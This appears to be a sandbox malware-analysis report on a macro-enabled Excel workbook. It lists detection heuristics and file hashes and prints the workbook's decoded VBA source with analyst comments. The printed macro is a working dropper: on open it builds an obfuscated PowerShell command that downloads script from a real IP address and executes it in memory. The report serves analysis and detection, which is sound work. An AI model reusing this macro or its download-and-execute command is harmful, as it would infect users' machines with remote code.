MALICIOUS
190
Risk Score
Heuristics 7
-
VBA project inside OOXML — medium — 4 related findings — OOXML_VBA: Document contains a VBA project — VBA macros present
-
WScript.Shell usage — critical — OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
Set NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy = (((CreateObject("WScript.Shell")))):::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open() -
Suspicious extracted artifact — medium — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://179.43.140.150/shtq/Faxk.jpg — in document text (OOXML body / shared strings). Note that the same URL also appears as the download target inside the PowerShell command string assembled by the Workbook_Open macro (see the extracted-script preview below), so it is reached by the macro channel as well.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7860 bytes |
| SHA-256: 7e9ab7c0db8dc33e31fba81f87b0ff5ff42b287b0afd171463858aac7c81e035 | | | |
Detection
ClamAV:
No threats found (signature-based scan only; a miss here does not override the heuristic findings above)
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' Analyst note: auto-execution entry point — this Sub runs as soon as the workbook is
' opened with macros enabled. The operative payload is the "Powershell" string assembled
' below and the WScript.Shell .Run call near the end; most of the surrounding code reads
' like lifted spreadsheet-helper code that pads the procedure (inferred from its shape).
' Identifiers such as NJMK..., eNAX... and the token BAsLyHuBXQVXAstJiwUT are mangled names.
On Error Resume Next
' Analyst note: from here on every runtime error is silently swallowed, so the padding
' code may reference undeclared or never-instantiated objects without stopping execution.
Dim iDPycO As Range, fiibIZiByuThLf As Range
' Reads column A from A2 down to the last used row, widened to 11 columns, into a Variant array.
Set fiibIZiByuThLf = Range([A2], Range("A" & Rows.Count).End(xlUp)).Resize(, 11)
PIiWIGGaPfBfPSktNDzIUe = fiibIZiByuThLf.Value ' BAsLyHuBXQVXAstJiwUT
Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = CreateObject("scripting.filesystemobject")
' BAsLyHuBXQVXAstJiwUT
' Creates a subfolder beside the workbook, named with the same mangled token used throughout.
BaseFolder$ = ThisWorkbook.Path & "\BAsLyHuBXQVXAstJiwUT\": MkDir BaseFolder$
' BAsLyHuBXQVXAstJiwUT
' For each row of the array: make a subfolder named after column 7, then write column 10
' into "<column 2>.txt" as a Unicode text file.
For i = LBound(PIiWIGGaPfBfPSktNDzIUe) To UBound(PIiWIGGaPfBfPSktNDzIUe)
' BAsLyHuBXQVXAstJiwUT (BAsLyHuBXQVXAstJiwUT)
Folder$ = BaseFolder$ & PIiWIGGaPfBfPSktNDzIUe(i, 7) & "\" ' BAsLyHuBXQVXAstJiwUT - ? BAsLyHuBXQVXAstJiwUT G
MkDir Folder$
' BAsLyHuBXQVXAstJiwUT
Filename$ = Folder$ & Trim(PIiWIGGaPfBfPSktNDzIUe(i, 2)) & ".txt"
' BAsLyHuBXQVXAstJiwUT BAsLyHuBXQVXAstJiwUT Unicode
Set ts = eNAXoXQpiyfoatLzteivsrYbiotKrYsSr.CreateTextFile(Filename$, True, True)
ts.Write Trim(PIiWIGGaPfBfPSktNDzIUe(i, 10)) ' BAsLyHuBXQVXAstJiwUT
ts.Close
' BAsLyHuBXQVXAstJiwUT
Next i
Set ts = Nothing: Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = Nothing
MsgBox "BAsLyHuBXQVXAstJiwUT" & vbNewLine & BaseFolder$, vbInformation, "BAsLyHuBXQVXAstJiwUT"
' BAsLyHuBXQVXAstJiwUT
' Analyst note: payload construction starts here. "Powershell" is assembled one character
' per variable so the literal never appears in the source. The long runs of ":" that end
' several lines are empty VBA statements (":" is the statement separator) and carry no
' behaviour; they only inflate the line.
Dim NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy, kKSfoEIGCB
bsbtqeFQe = "P":
UdwIvKHbLOyQrDYATMCNAiEfXiQdpY = "o":
MUzTzvPuoESOKbSR = "w":
iObMGCHJHDyP = "e":
bsdC = "r":
HSrh = "s":
raFhoFdyRU = "h":
bACV = "e":
HVJKSeYy = "l":
OAKUVBHNhJdYrokfETJibQDGVJSPicTPI = "l"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
' Analyst note: the text appended next uses backticks and per-character string sums, which
' PowerShell resolves to IEX (New-Object Net.Webclient).DownloadString('http://179.43.140.150/shtq/Faxk.jpg'),
' i.e. fetch remote content and execute it in memory. The same URL is listed under
' Embedded URL in this report. The ".jpg" name is not evidence of an image — whatever is
' served is executed as script; its content is not shown on this page.
kKSfoEIGCB = bsbtqeFQe + UdwIvKHbLOyQrDYATMCNAiEfXiQdpY + MUzTzvPuoESOKbSR + iObMGCHJHDyP + bsdC + HSrh + raFhoFdyRU + bACV + HVJKSeYy + OAKUVBHNhJdYrokfETJibQDGVJSPicTPI + " I`EX ((n`E`W`-`Ob`j`E`c`T ('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+''+'r'+'i'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).Invoke('http://179.43.140.150/shtq/Faxk.jpg')""":::::::::::::::::::::::::::::::::::::::::::::::::::
' Analyst note: WScript.Shell is the launcher object for the .Run call further down.
Set NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy = (((CreateObject("WScript.Shell"))))::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
On Error Resume Next
' BAsLyHuBXQVXAstJiwUT
' Analyst note: the lines down to the "Run" assignment are filler. Colors is never read,
' and coll / dupes are never instantiated anywhere in this Sub, so the dedupe loop only
' raises errors that On Error Resume Next hides.
Colors = Array(737481, 737481, 737481, 737481, 737481, 737481, 737481, _
737481, 737481, 737481, 737481, 737481, 737481, 737481, 737481)
Err.Clear: Set ra = Intersect(Selection, ActiveSheet.UsedRange)
ra.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
For Each cell In ra.Cells ' BAsLyHuBXQVXAstJiwUT dupes
Err.Clear: If Len(Trim(cell)) Then coll.Add CStr(cell.Value), CStr(cell.Value)
If Err Then dupes.Add CStr(cell.Value), CStr(cell.Value)
Next cell
For Each cell In ra.Cells ' BAsLyHuBXQVXAstJiwUT
Next cell
Application.ScreenUpdating = True
raFhoFdyRU = "Run":
' Analyst note: this "Run" string is not consumed by the launch below — that is a direct
' method call — so the reassignment is noise (raFhoFdyRU already served as "h" above).
On Error Resume Next: Err.Clear
' Analyst note: writes txt (never assigned in this Sub) to Filename; "SaveTXTfile = Err = 0"
' looks like a leftover from a function of that name — inferred, not observable here.
Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = CreateObject("scripting.filesystemobject")
Set ts = eNAXoXQpiyfoatLzteivsrYbiotKrYsSr.CreateTextFile(Filename, True)
ts.Write txt: ts.Close
SaveTXTfile = Err = 0
Set ts = Nothing: Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = Nothing
' Analyst note: the next line is a comment of roughly a thousand random letters; it and the
' similar one after the .Run call are probably the "2 long base64-like blob(s)" the static
' triage reports (not confirmed).
'TLZwMpvTThGwLrnJrZQEyhEyUMBMrELfMLQwxJJsEJTpxUhUxOQiihJhhfCQDvwwBwwQEBCfEGQhAZsMpkyxEAyAwAsiCJMyGrsZTGTBDfyZGwyvwCJCkiMDCJnLsGkshCQUiLxCfiihyDvQyhUMQTfiTnBGhssnCZrZQnGOwCOAMpiOxnDviLAsiZEpCUywCpZsOEMUwBnyvrOxJGZkMhJEpLsivTfxJiGhhvQLnUCAxyhTAOLUffEULkEJJLAvArhGhLTxGQLLxUOrrivfDUiEyiBnxpwUvnMJhQGLTnLDxpsDOnDOCvprvDpiCyQTMDCCULGrZrpGGxiCCAJvBLsQhCZrJiBnBffOGJyhAphkDChETGsAhriUwCUsnsDsUsJwUMiyyQDfEZfZUknECfpZyUUZpZJMvTswTGCyiUTGkxTiiDyiDAJLwvCQZfCspfknOsGkCZxhOxEsEnsvGpDsfLMOLCsZALTTryMCnfDZhQpixpBxEMvQQyAhsUnMiwyJhBOBMhnwvLCfOLfpnkksCTrBxppkGDDGCZkBwQxDQCTOpBiZLhwhAxxsZAEhUifpUiLGwJOnvTAQMCGBEJMnsBTQMyrJByUZOxEwyLkwiELypZsBvyfhiGBOrkhCfkQknkLyZDkpnBkOTnkUxUZLkJsZvZnGrvGhEQiLQUrAfrkABGTTQpwinOQiUnOQfrUEpwUrkMyfEpyfMQviGZGxxikxQMswBrvpBGwCOQfQrfyhEDOyEQsZhDiwADrkfrhnDChAMwMGyfJUEEkfkUMBkEZsiMACBvfQnUEUvBUQQBGECQMOChQirLUpwTrMJrJpMJOCMAJZQMvZGkhUQwQivUvyMLyLxUpvUTEyLrpAMUiTCfxAGvMhrpfZZrvUynMZhQfAhAGvLh
' Analyst note: EXECUTION POINT — WScript.Shell.Run launches the assembled PowerShell
' command line. The second argument is the window-style parameter; 737481 is not one of the
' documented 0-10 values (how WSH treats it is not confirmed here). Detection: the source-level
' obfuscation does not survive execution — PowerShell script-block logging and process-creation
' telemetry (the Excel host spawning powershell.exe with an IEX/DownloadString command line)
' see the de-obfuscated command.
NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy.Run kKSfoEIGCB, 737481::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
'pTJCkTxsLfnrZwpCiUEyiZfhLCyQpDQsQTAMMLLyLsMDDQxLDiriBQUhkQrvMZwyfDrhJpChGBDvZwrkQDfwOLfMBxiMhCynpZnMvyEEsGZQfAChBsvDyQvCMTkCEvQLkGDQETCxAshxnfDDMLErMLZpBrQLGUQhGwOMBCDZJwExAEvskTvpxvLMCrEMrEUTAQUBTfhrypDBJnMCUGwpAJxkOprxLfhGCnApCMUrhZTspxOvTiZGQvxZyhGCpCALZnELGhMiiBZJDpifQihsZQfnTkrUAsZxODksLJOGOsirErUvOQCEyMnZsrGvsZvvTMiQLvCpnQEOZACQAiBpJJGpfnMhEsrGGAnrCUTDysrTvJQwifDTCfUfsnDZvUifBfZOsLyTEsTyfpfBnnihMMZwTskBxAhMrJiOvkhGiOwppwQwAGCnnLGnxLrQQOALvTwvEywUOLiJBpLrsJDyGkwsEOfrfhfnnOfTMTnyfhJyABQsQQGAvTTyrhZxkBZLTOLhCfrULUkMQCwyiErDQrEZTOwAArGJvBQwyshfvOLhfTTOGGDhZUkwUnAfDZvGLwEExMMCDJJLsfUMTZCvknvJUMCUwwwrsrvsEwfGGkErhnJLkApZBQBZyDvCTLxshDiiJCBEyUiMvLQOpEhJLiysUEyhTLAvvkGEkOEvfUfkZBBfDGsErrZiiCQGhOBDvsEyTBkQQLrsxGLpyLEJUOLZBUCCOGUTpQxOxkOhvswAQOfZrkOByUUGLpiBwCLDDnEZZAhfpfZCUOLhZwkkypMExUhAAsfwZhnwyZQZwCfLfsOAJkrQTQUEMMnfxTEnQLwJpkpMwBhpCihpnyZLiDvLOCwUxfMBLhLxpkQMirMUsBULAhGhAAJfvpiGhryfnkkUGxQUTxsrfhUsGpCynpfOnyBMpDprnsiZyQrhhi
'On Error Resume Next:
'Err.Clear
' Set bsbtqeFQe = CreateObject("scripting.filesystemobject")
' Set NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy = bsbtqeFQe.CreateTextFile(Filename, True)
' BAsLyHuBXQVXAstJiwUT,
' BAsLyHuBXQVXAstJiwUT coll
' Analyst note: trailing filler after the payload has already run. "VBScript.EcOAntBFudwYdRB"
' is not a valid ProgID — the name mangler appears to have rewritten the class name inside the
' string (.Global/.Pattern/.Execute suggest it was RegExp; inferred), so CreateObject fails and
' the whole block errors out silently. iDPycO is declared As Range above and is never Set; the
' plain assignments to it here would also raise, and are hidden the same way.
iCDRZIYBwdILp$ = "ZZZXXXZZZ": azreEWJuoFdXsEBYtYUIoZySSFYRoCsWFRRKZI$ = "BAsLyHuBXQVXAstJiwUT": On Error Resume Next
iDPycO = Replace(iDPycO, ".", iCDRZIYBwdILp$): iDPycO = Replace(iDPycO, "-", azreEWJuoFdXsEBYtYUIoZySSFYRoCsWFRRKZI$)
Set EcOAntBFudwYdRB = CreateObject("VBScript.EcOAntBFudwYdRB"): EcOAntBFudwYdRB.Global = True
EcOAntBFudwYdRB.Pattern = "[\w]{1,}@[\w]{1,}" & iCDRZIYBwdILp$ & "[\w]{1,}"
If EcOAntBFudwYdRB.test(iDPycO) Then
Set objMatches = EcOAntBFudwYdRB.Execute(iDPycO)
For i = 0 To objMatches.Count - 1
wRLfyyCKnNnAnZyKrMpMzHGIGNu = objMatches.Item(i).Value
wRLfyyCKnNnAnZyKrMpMzHGIGNu = Replace(wRLfyyCKnNnAnZyKrMpMzHGIGNu, iCDRZIYBwdILp$, "."): wRLfyyCKnNnAnZyKrMpMzHGIGNu = Replace(wRLfyyCKnNnAnZyKrMpMzHGIGNu, azreEWJuoFdXsEBYtYUIoZySSFYRoCsWFRRKZI$, "-")
coll.Add wRLfyyCKnNnAnZyKrMpMzHGIGNu, wRLfyyCKnNnAnZyKrMpMzHGIGNu ' BAsLyHuBXQVXAstJiwUT
Next
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{0D53A875-8CE5-4B30-9776-C52768FD0A39}{8263307E-7316-465A-A1B4-870212F76017}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 26624 bytes |
| SHA-256: 3adb0dc2735aab0f8d637f7bde1935a158c8f35652a5c49bc6a876d0e0cf9ffe | | | |
Detection
ClamAV:
No threats found (signature-based scan only; a miss here does not override the heuristic findings above)
Obfuscation or payload:
likely
210 of 377 identifiers look randomly generated (e.g. 'pTJCkTxsLfnrZwpCiUEyiZfhLCyQpDQsQTAMMLLy') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||